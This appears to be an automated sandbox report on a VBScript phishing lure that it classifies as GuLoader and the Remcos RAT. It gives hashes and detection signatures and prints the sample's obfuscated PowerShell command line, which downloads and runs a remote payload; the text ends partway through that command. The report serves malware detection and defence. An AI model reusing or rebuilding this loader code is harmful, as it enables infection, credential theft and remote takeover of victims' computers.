Edit tour
Windows
Analysis Report
TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs
Overview
General Information
| Sample name: | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs |
| Analysis ID: | 1465344 |
| MD5: | 003c272edd6f7cf2b08bfc98d1d48c7c |
| SHA1: | a6ee590e3b81dbbce6e550c6dba9256c76cd4e21 |
| SHA256: | 78e63f6cc614c9dcc77c0c6b8fc6088ce89533d7c05b66b7732904ad6bc886d6 |
| Tags: | vbs |
| Infos: |   |
 | |
Detection
GuLoader, Remcos
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 3476 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\TOP U RGENT PURC HASE ORDER SHEET & S PECIFICATI ONS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 1908 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'Sewerage Oplsnings aftenens S krivebords teoriers S trubelyden e187 Ascon Frilgge T lsynspligt ernes Efte rskrifter Filterable Afgiftsob jekter Syt jerne Unpu rchased Be stte Ligem and Michel a enarthro ses philot echnical P atternise Unsaponifi ed31 Svamp ekosten Mi ljforbryde lserne For mastelse K ongrespala dss Ophios taphyle Se werage Opl sningsafte nens Skriv ebordsteor iers Strub elydene187 Ascon Fri lgge Tlsyn spligterne s Efterskr ifter Filt erable Afg iftsobjekt er Sytjern e Unpurcha sed Bestte Ligemand Michela en arthroses philotechn ical Patte rnise Unsa ponified31 Svampekos ten Miljfo rbrydelser ne Formast else Kongr espaladss Ophiostaph yle';If ($ {host}.Cur rentCultur e) {$Sulph oacetic++; }Function Ivywood($O versteges) {$Swelly=$ Oversteges .Length-$S ulphoaceti c;$Undfang elsestidsp unkter='SU BsTRI';$Un dfangelses tidspunkte r+='ng';Fo r( $Maladm inisters=1 ;$Maladmin isters -lt $Swelly;$ Maladminis ters+=2){$ Sewerage+= $Overstege s.$Undfang elsestidsp unkter.Inv oke( $Mala dministers , $Sulphoa cetic);}$S ewerage;}f unction Un isexes($Do bbelterklr ingens){ . ($Botan ikkerne) ( $Dobbelter klringens) ;}$Fyldepe nneblk=Ivy wood 'aM.o Rz i l lTa R/B5 . 0H A(eWFi n,d FoMwEs, .N TT, ,1B0 . ,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1 R. 0L)d ,G ,eHc.kAo,/ .2.0K1.0 0 ,1V0 1. SF imrDe fAo x,/a1F2.1 J. 0T ';$K ilders=Ivy wood 'SURs e,rT- AVg Be n tN '; $Ascon=Ivy wood 'RhDt .t p.sR:M/ / c oPn t .e mCeSgEa c. cSo.mC. Od o / N e SwV/ N eaw /.PIuTsCt eAn eP.Tl YpPkT ';$M arijanne=I vywood ' > ';$Botani kkerne=Ivy wood '.iPe x. ';$Kan didaternes ='Efterskr ifter';$Sp indelvvs = Ivywood ' e c h.oT %Fa pHpSd. a,tFa.% \ K aNs.i nS oOeUr,n.e ..P r i, , &H&E ePc.h oT tB ';U nisexes (I vywood 'E$ Tg l,oPbfa l :,BBe,d Mr eNv iCd MeDnAdUe = .(OcKm,d /.c $LSLp ,iTn d e,l Rv v s ) ' );Unisexes (Ivywood ',$ g.l o, bCa l,: SO t r ubb e, l yBd e nL e 1.8,7 =s $,Ads c.o, nT..s pBlM i.t ( $ M. aCr.iSjOa n.n ef)O ' );Unisexes (Ivywood ',[rN e tS .ESSeGr.v i c eRP,o. iFnktUM.a nSa.g e rM ]E:T: SpeE cBu rUiAt, ySPMr,oTtU oGcAo l ,= M [kN,eAtE .SS.e c u rUiEt ymPC rSo tSoAc oDlTTOyPpU eT].:,:BTE lFsg1S2B ' );$Ascon=$ Strubelyde ne187[0];$ Utilitaria nises= (Iv ywood '.$, g l o.b aF lI:CCToLrS tniMcTiPpB eHtRaVlS=. N eywH-SO bBjFeMc t. AS,y,sCtP e.m . N e t .RWMeHbU CMl,i,ern t');$Utili tarianises +=$Bedrevi dende[1];U nisexes ($ Utilitaria nises);Uni sexes (Ivy wood ' $KC Ro r t,iAc i pSe t,a VlS.FHVePa .d,eSr s [ ,$AK ibl d Se r s ]K= .$ F y.l,d ePp,e n n me bSlSk, ');$Confre re=Ivywood '.$.C oTr tSiWcSiHp .e,tEa lG. CD o wFn,l ooa.d F i